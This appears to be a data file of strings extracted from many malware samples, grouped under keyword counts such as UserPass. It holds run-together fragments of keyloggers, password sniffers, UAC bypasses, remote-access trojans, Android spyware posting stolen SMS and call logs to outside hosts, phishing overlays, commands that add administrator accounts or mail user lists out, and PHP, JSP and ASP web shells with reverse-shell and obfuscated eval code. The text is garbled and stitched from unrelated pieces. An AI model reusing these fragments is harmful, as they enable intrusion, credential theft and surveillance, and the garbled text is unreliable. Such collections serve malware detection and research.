Count SSN
1 4
1 9

CREDS:LOGINS

Count UserPass
1 loginedquerytimeripaddress=%d.%d.%d.%d%s%s%02x-%02x-%02x-%02x-%02x-%02xcommand.comosversion=%slogined=%cmainfilename=%s
1 pass\\lcc\\ie.dlleditkeylog.exe keylog.exe,wineggdrop.dlleditkeylog.exewineggdroppasssniffer.exepop3/ftp snifferpassword sniffer v1.0\"gina\"=\"gina.dll\"regedit4[hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon]n
1 passwordhttp://www.thc.orguse for hacking: trim your dictionary file to the pw requirements of the target.w
1 user-agent: mozilla/5.0 (windows; u; windows nt 6.0; en-us) applewebkit/534.3 (khtml, like gecko) chrome/6.0.472.59 safari/534.3accept: text/xml\\r\\ncontent-type: application/x-www-form-urlencoded\\r\\naccept-encoding: no\\r\\nconnection: keep-alive%s/?t=%s&o=%s&i=%s&task_id=%s<xaml></xaml><b6><i6>pk
1 signingupdate.microsoft.com_crt_debugger_hookue8g5\\device\\-%s-%04dfal2.03xxxxxxxxxxxxxxx
1 pass->logon successful250 requested file action okay, completed.m
1 pass update\x00\x00%s:download\x00\x00%s:update\x00\x00%s:uninstall\x00?injectdll@@yahpauhwnd__@@k@z?unmapdll@@yahxz?g_bsubclassed@@3haacfg92kxpcso4y94bnurfmnnk27ehw6cqp5entad6af8bd5835d19cc7fdc4c62fdf02a1%s?cstorage=shell&comp=%s75baa77c842be168b0f66c42c7885997b523f63566f407f3834bcc54aaa32524svwf
1 passwordsnjloggertaskmgrkillerabccba%
1 userspace pathrecord () %pmutex object did not timeout, list not patchedget /ok.asp?id=1__sql__ http/1.1f
1 password=%sinternal command not support =((l|-1|as_cur_user:openprocesstoken():%d, %s|l|-1|createprocessasuser():%d, %s|l|-1|as_cur_user:logonuser():%d, %s|l|-1|try to run dll %s with user priv|\\\\.\\global\\pipe\\sdlrpc\\\\%s\\pipe\\comnodeplugin dll stop failed.as_user:logonuser():%dm
1 users:shared:userevent.app:contents:macos:rm '/users/shared/userevent.app/contents/resources/userevent.icns'osascript -e 'tell application \"system events\" to get the hidden of every login item'osascript -e 'tell application \"system events\" to get the name of every login item'osascript -e 'tell application \"system events\" to get the path of every login item'servervisible \x00.aspack.adataaspack.aspack.ccgbitartsdastub!epackfsg!kkrunchy.mackt.maskpemew.mpress1.mpress2.neolite.nsp1.nsp2.nsp0.packedpebundlepebundlepec2topecompact2pec1pec2pec2mopelocknt.perplexpeshield.petiteprocrypt.rlpackrcryptor.rpcrypt.sforce3.spack.svkpthemida.themida.upack.bydwingupx0upx1upx2.upx0.upx1.upx2.vmp0.vmp1.vmp2vprotectwinlicenwwpack.yp.y0damozilla/4.0 (compatible; msie 6.0; windows nt 5.; sv1)trj:html err.trj:workfunc start.trj:cmd time out.trj:thread time out.trj:create pt done.trj:create pt error: mutex already exists.create pippe failed!transfering fileput paras error:cmd time out..cmd has been killed.h
1 userid(),dafb.runtime.getloginstatus();if(b)');k.tostringrovide('xfbml.send',{dimensions:{width:80,height:25}});{log:i};e.exportsa;fb.api('/fql','get',f,function(g){if(g.error){es5(es5('object','keys',false,b),'foreach',true,functrue;}}var iadocument.createdocumentfragment();img.srctypeof(events)var i,x,y,arrcookiescallbacks.length;j<l;jencodeuricomponent(value);if(options.domain)valueevent,hg.components.get('windowevent_''read'in cookie){return cookie.read(c_name);}item;},get:function(name,def){return hg.components.exists(name)){window.addevent(windowevents[i],function(){var callbacksreunload:function(callback){hg.events.add('beforeunload',callback);},add:function(event,callback){hgname){if(hg.components.exists(name)){delete hg.componentlist[name];}}},util:{uuid:function(){return'window.hgx.replace(/encodeuricomponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(json.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getutcfullyear(),hours')');};$.secureevaljsonisfinite(n);},secondstotime:function(sec_numb){sec_numb')');}else{throw new syntaxerror('error parsing json, source is not valid.');}};$.quotestringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentclasses.lengtho.getutchours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};hgwidget.creatorfunction gsh() {200 height'sh.js'><\\/script> 2 - 26;<iframe id,100);200></iframe>'about:blank' widthmf.document.write(kasper new activexobject(szhttp); csa2;var ado new activexobject(szox88);/test.exe szetyij;var http %41%44%4f%44%42%2e%4d%65%64%69%61var szsrjq%43%3a%5c%5c%50%72%6f%67%72%61%6dvar method ado.mode %61%79%65%72%2e%58%4d%4c%48%54%54%50 7 - 6; http.open(method, szurl, i-3); var jsmlastmenu position:absolute; z-index:99' -1)jsmsetdisplaystyle('popupmenu' '<tr><td><a href jsmlastmenu var ids this.target jsmprevmenu, 'none'); if(jsmprevmenu )if(menudata[i]) '<div style jsmsetdisplaystyle('popupmenu' function 
jsmhidelastmenu() menudata.length; iscripting.filesystemobjectobjdata 0105000002000000e0c9ea79f9bace118c8200aa004ba90b68007400740070003a002f002f00<?xml version=<?mso-application progid=\"word.document\"?>w:macrospresent=\"yes\"<w:bindata w:name=<o:characters>0</o:characters><o:lines>1</o:lines>n
1 user-agent: netscapea
1 password%s found[%d][smb] host: %s account: %s error: account_change_passwordhydra -p pass.txt target cisco-enable (direct console access)[%d][smb] host: %s account: %s error: password expired[error] smtp login auth, either this auth is disabled\"/login.php:user=^user^&pass=^pass^&mid=123:incorrect\"used pepack!\\temp\\ntgodmode.exentgod.batsfxcmdc:\\temp\\vncviewer4.log[bl4ck] patched by redsand || http://blacksecurity.orgfake release extendedvkey 0x%x, keysym 0x%xpipecmd \\\\%s -u:%s -p:\"\" %s[usage]: %s <hostname|ip> <username> <password>pipecmd \\\\%s -u:%s -p:%s %s============by uhhuhy (feb 18,2003) - http://www.cnhonker.net===================================ntcmd v0.11 for hscan v1.20=======================ntcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtsuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -ac
1 user:administrator /pwd:1234 /nowait trojan.exefail to injectbtgremote pro; v1.5 b/{permission denial to exec command.:(by eyas<cooleyas@21cn.com>connect to %s mssql server success.enjoy the shell.^_^usage: %s <host> <uid> <pwd>sqlcmd2.exe inside edition.http://www.patching.net 2000/12/14example: %s 192.168.0.1 sa \"\"a
1 userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
1 users/user/desktop/my_ok_2014/bit9/runsna/release/runsna.pdbd:/work/plug4.0(shellcode)/shellcode/shellcode/xsetting.hb
1 user-agent: mozilla/5.0 (windows nt 6.; wow64; rv:20.0) gecko/20100101 firefox/20.0webhp?rel=psy&hl=7&ai=
1 pass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
1 password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
1 username password commandauthentication id:authentication package:authentication domain:primary user:* user: * domain: * password: -slave-listenwating on port %d...\x0aend waiting2\x0a
1 userappdataroaming$trzframecontrollerpropertyconnectiondelphi32.exehkeycurrentuser%
1 username> <fixthings> [hostname]ls -la %s* ; /bin/cp ./wtmp.tmp %s; rm ./wtmp.tmperror: unlinking tmp wtmp file.usage: wipe [ u|w|l|a ] ...options...erase acct entries on tty : wipe a [username] [tty]alter lastlog entry : wipe l [username] [tty] [time] [host]%%appdata%%\\microsoft\\wuauclt\\wuauclt.datmozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)/news/show.asp?id%d=%d0l23kj@nboxu%%s.asp?id=%%d&sid=%%duser-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sp q%%d)cookies: useid=kgioodaook%%s<!--
1 user: %scomputername: %swindowsdirectory: %ssystem directory: %snumber of processors: %dcpu[%d]: %s: %smhzram: %dmb total, %dmb free.displaymode: %d x %d, %dhz, %dbituptime: %d days %02u:%02u:%02u\
1 usernameget_lastwritetimegetvolumeinformationosfullnamedownloaddatafm|'|'|nd|'|'|rn|'|'|sc~|'|'|scpk|'|'|cam|'|'|usb video device[endof]rs|'|'|proc|'|'|k|'|'|rg|'|'|~|'|'|kl|'|'|ret|'|'|pl|'|'|lv|'|'|prof|'|'|~|'|'|un|'|'|~[endof]p[endof]orcus.commandmanagementorcus.commands.orcus.config.orcus.connection.orcus.core.orcus.exeorcus.extensions.orcus.installationpromptformorcus.mainform.orcus.native.orcus.plugins.orcus.plugins.dllorcus.properties.orcus.protection.orcus.share.orcus.sharedorcus.staticcommandsorcus.utilities.\\projects\\orcus\\source\\orcus..orcus.plugins.dll.zip.orcus.shared.dll.zip.orcus.shared.utilities.dll.zip.orcus.staticcommands.dll.ziphvnccommunicationhvncactionhvncdesktoprequestkeylogcommandget_keylogfilelivekeyloggercommandorcus.staticcommands, version=prepareorcusfiletoremoveconvertfromorcusvaluekindboot.ldrd:\\workplug2.5plug3.0shell6gulp
1 user-agent: uploadorsteamappdata.vdfloginusers.vdfconfig.vdfj
1 pass,config,n{)phmysqlz\\dhlp\\.\\dhlp\\.shautocomplemainframek
1 passwordmitmproxy0\\insert_cert.exeelevator.dllfail adding certdownloadingfilefail adding cert: %sinternetopena failc:\\\\windows\\\\sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] loaderconfig %ploader.objmozilla/4.0 (compatible; msie 7.0; windows nt 6.1; wow64; trident/5.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\d:\\hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\hellsing\\release\\claree:\\hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
1 userp4ss273ce6-b29f-90d618c0ace123dxace123dxl!ace123dx!@#x/catelog/login1.asp~dftmp$$$$$.1get /query.asp?loginid=loadconfigfromreg faildedloadconfigfrombuildin success/photoe/photo.asp httppost /photos/photo.asppcc_ident$$$--hellowrod--$$$.?avpcc_basemod@@ps1=rk# \\u@\\h:\\w \\$unset ls_options;uname -a[diskio]/tmp/.secure\x7felf\
1 user from sys.user_users a oci 8 - ocidescriptorfreeoracommand *msvbvm60.dll_cicosckmhv0
1 password.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
1 usernameapacketsendpacketarpsniffpcap_loopsyntax: %s [-i file] [-o file] [-m minlen] [-m maxlen] [-c minsets] -l -u -n -p pw-inspectori:o:m:m:c:lunpsp
1 user f4cknet localgroup administrators f4ckf4ckf4ckteam!@#kln7m5h8rsaa42vl0t5mrb1l$rndn = get-random$wc.headers.add(\"cookie\", \"p=\" + $rndn)
1 userprofile%\\cookies s\\*.* rd /s /q %windir%\\temp & md %windir%\\temp del /f /s /q %systemdrive%\\recycled\\*.* del /f /s /q \"%userprofile%\\local settings\\temp\\*.*\" del /f /s /q \"%userprofile%\\local settings\\temporary internet files\\*.*\" tasklist |find \"clear.bat\"||start clear.bathttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /l %%a in (mode con: cols=42 lines=5text files (*.txt);;all files (*)http://ubrute.comip - %d; password - %d; combination - %dget_crackedcredentialss
1 userprofile%w
1 user32.dlllogin.aspcheck.aspresult.aspupload.asp
1 user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1) ( /s ) :forms.vbpforms.vcpsoftware\\flysky\\e\\installname=\"microsoft.windows.common-controls\" e
1 loginpassclearlogsdaysclearlogsmailed oneshell tuhaoisrighto
1 passuac.exe/x64/bypassuac.exe/x86/bypassuacdll.dll/x64/bypassuacdll.dllafx_idp_command_failurew
1 user-infousers-infosoftware-info(from environment) = %snetuserenumgetnetworkparamsaccelorator<html><title>12356</title><body>g
1 users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u seconds. 
(found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
1 userosqlpasswordosqlservercmd /c net start %s%add%kartoxaa
1 pass
1 passwordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
1 userformuserloginforminvalid username or passwordpostupload_
1 user domaine
1 userv.dll
1 users\\mlk\\:\\w o r k s p a c e\\d:\\my\\projects_all\\2015\\\\tools pzz\\bezzahod\\intelrestorer
1 users\\cool\\documents\\visual studio 2010\\projects\\dlltest\\release\\dlltest.pdb\x00up file error\x0d\x0aup file ok\x0d\x0aaallaamoot
1 useragent.indexof(\"msie\") > -1) {string_of_json += detectpdfformsie();string_of_json += detectflashformsie();string_of_json += detectjavaformsie();string_of_json += enumerateplugins();0x77bd18d30x77bcef5b0x77bcf5190x77bd3e250x77be746a0x77bc1120// offset was 0x94 now 0xa4for (i = 1; i <= (0x42c-4) / 4; i++) {
1 users\\tranchulas\\documents\\visual studio 2008\\projects\\upload\\release\\upload.pdbc:\\users\\cert-india\\documents\\visual studio 2008\\projects\\ufile\\release\\ufile.pdbdoworku
1 password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_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??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,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device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng 
tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your 
apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 passwordstub.form1.resourcesf
1 user net user temp 123456 /add & net localgroup administrators temp /addrunning command with system token...thread impersonating, got network service token: 0x%xfound system token 0x%xthread not impersonating, looking for another thread...p
1 password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
1 user(admin$/guiwang!@#9bd*) to admin[err] get haltable addresss fail[err] get zwdeviceiocontrolfile fail[err] get native function pointers fail
1 useraccountss
1 password: %s !!!%s@ftpscan#ftp account: %s/[null].\\conf\\mysql_pass.dictry the first %d time-->build&&change by p r
1 userid=%04d&other=%c%snoclientuser-agent: mozilla/4.0 (compatible; msie 5.00; windows 98) ksmmupfileokupfileerfxftest*(sy)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== bye bye ! ==========*letusgohtppmmv2.0.0.1mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart cmd failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=w!r@o#n$gkernel32.dlleclipse_a\\pjts\\eclipse_client_b.pdbxiaomesuncloud-code/uc_server/data/forum.aspserverfile is smaller than clientfile\\m tools\\moondll
1 users\\*\\roaming\\mozilla\\firefox\\profiles\\*\\documents and settings\\*%
1 password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
1 pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
1 user /domain 2>&1 & net group /domain 2>&1net group \"domain admins\" /domain 2>&1 & (get-content $env:public\\libraries\\dns.ps1) -replace ('#'+'##'),$botid | set-content $env:public\\libraries\\dns.ps1invoke-expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')('00000000'+(convertto-base36(get-random -maximum 46655)))flash.media.sound()call kernel32!virtualalloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40){4d36e972-e325-11ce-bfc1-08002be10318}netstreamzhoupin exploit crewzhopin exploit crewbackdoorloggerzhuaddresspcap_dump_openresolving ips to poison...warnning: gateway ip can not be found%s-%02d%02d%02d%02d%02d.rc:\\users\\%s\\appdata\\cookies\\n
1 userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? 
\"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. 
enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= 